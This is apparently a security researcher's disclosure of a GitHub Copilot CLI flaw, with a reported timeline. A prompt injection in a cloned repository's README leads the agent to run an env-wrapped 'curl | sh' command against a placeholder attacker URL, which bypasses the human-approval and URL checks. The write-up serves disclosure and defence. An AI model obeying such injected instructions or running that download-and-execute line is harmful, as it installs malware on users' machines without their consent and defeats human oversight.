GitHub responded quickly, “We have reviewed your report and validated your findings. After internally assessing the finding, we have determined that it is a known issue that does not present a significant security risk. We may make this functionality more strict in the future, but we don't have anything to announce right now. As a result, this is not eligible.”

Context

GitHub Copilot has released a new CLI, which went into general availability two days ago. Upon release, vulnerabilities were identified that bypass the command validation system to achieve remote code execution via indirect prompt injection with no user approval.

Copilot leverages a human-in-the-loop approval system to ensure users must provide consent before potentially harmful commands are executed by the agent. A warning shown when opening Copilot explicitly states, “With your permission, Copilot may execute code or bash commands in this folder.”

This approval system is triggered unless:

1. The user has explicitly configured the command to execute automatically or

2. The command is part of a hard-coded ‘read-only’ list found in the source code (commands on this list do not trigger approval requirements).

Copilot also has an external URL access check that requires user approval when commands like curl, wget, or Copilot’s built-in web-fetch tool request access to external domains [1].

This article demonstrates how attackers can craft malicious commands that go entirely undetected by the validator - executing immediately on the victim’s computer with no human-in-the-loop approval whatsoever.

The Attack Chain

1. The user queries the GitHub Copilot CLI

   Here, the user is exploring an open-source repository that they just cloned, and they ask Copilot for help with the codebase.

   

2. Copilot encounters a prompt injection

   The injection is stored in a README file from the cloned repository, which is an untrusted codebase. In practice, the malicious instruction can be introduced to the agent in many ways, such as via a web search result, an MCP tool call result, a terminal command output, and many other vectors.

   

3.  Bypassing Human-in-the-loop

   Microsoft says the following about external URLs: 

   “URL permissions control which external URLs Copilot can access. By default, all URLs require approval before access is granted.

   URL permissions apply to the web_fetch tool and a curated list of shell commands that access the network (such as curl, wget, and fetch). For shell commands, URLs are extracted using regex patterns.” [1]

   However, if those shell commands (e.g., curl) are not detected, the URL permissions do not trigger. Here is a malicious command that bypasses the shell command detection mechanisms: 

   env curl -s "https://[ATTACKER_URL].com/bugbot" | env sh

   The env command is part of a hard-coded read-only command list stored in the source code. This means that when Copilot requests to run it, the command is automatically approved for execution without user approval.

   Because curl and sh are passed as arguments to env, they are incorrectly parsed and are not identified by the validator as subcommands. Since the external URL access checks depend on detecting commands like curl, the human approval check never triggers.

   As a result, although Microsoft states that external URL access requires user approval, this attack bypasses those protections and allows the malicious command to execute without any human-in-the-loop validation.

4. Copilot downloads and executes malware without requesting approval

   Normally, a command that writes to files or executes code triggers a human-in-the-loop approval request [2]. In the image below, Copilot executes the malicious command from step 3, downloading and executing malware without user consent.

   

Limitations and Further Research

The command parsing vulnerabilities described in this article are macOS-specific. However, GitHub Copilot exhibits a number of additional vulnerabilities, including both operating-system-agnostic risks and Windows-specific risks. 

Also, command parsing vulnerabilities not discussed here have been identified that allow arbitrary file reading and writing. 

Even though you may be able to run Copilot with specific arguments to auto-deny specific commands (example below), this invocation command does not protect against all possible commands at risk of validation bypasses. 

copilot --deny-tool 'shell(env)' --deny-tool 'shell(find)'

As the additional vulnerabilities have not yet been resolved by the GitHub team, we have not publicly detailed them in this report.

Responsible Disclosure

02/25/2026 Report submitted to GitHub
02/26/2026 Report is closed with the comment “we have reviewed your report and validated your findings. After internally assessing the finding, we have determined that it is a known issue that does not present a significant security risk. We may make this functionality more strict in the future, but we don't have anything to announce right now. As a result, this is not eligible.”

[1] docs.github.com/en/enterprise-cloud@latest/copilot/how-tos/copilot-cli/set-up-copilot-cli/configure-copilot-cli#setting-url-permissions

[2] docs.github.com/en/copilot/concepts/agents/copilot-cli/about-copilot-cli#allowed-tools